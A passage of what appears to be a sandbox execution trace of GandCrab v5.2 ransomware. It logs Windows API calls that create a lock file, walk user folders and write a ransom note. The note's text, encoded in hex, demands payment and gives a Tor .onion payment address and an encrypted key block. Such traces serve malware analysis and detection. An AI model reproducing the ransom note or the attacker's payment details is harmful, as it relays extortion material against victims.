33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0069.263] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0069.264] CloseHandle (hObject=0x2b4) returned 1 [0069.265] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.265] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.265] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0xe, wMilliseconds=0x24a)) [0069.265] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.265] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0069.265] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0069.266] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\d2ca4a09d2ca4deb61a.lock") returned 68 [0069.266] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0069.266] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.266] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.266] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\") returned 44 [0069.266] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\*" [0069.266] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x5034f8 [0069.267] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.267] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0069.267] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.267] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.267] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0069.267] lstrcmpW (lpString1="Acrobat", lpString2=".") returned 1 [0069.267] lstrcmpW (lpString1="Acrobat", lpString2="..") returned 1 [0069.267] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\", lpString2="Acrobat" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat" [0069.267] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\" [0069.267] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.267] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.268] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.268] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.268] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.268] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.268] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.268] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.268] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.269] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\\\TITWMVJL-DECRYPT.txt") returned 73 [0069.269] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Acrobat\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\acrobat\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2bc [0069.269] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x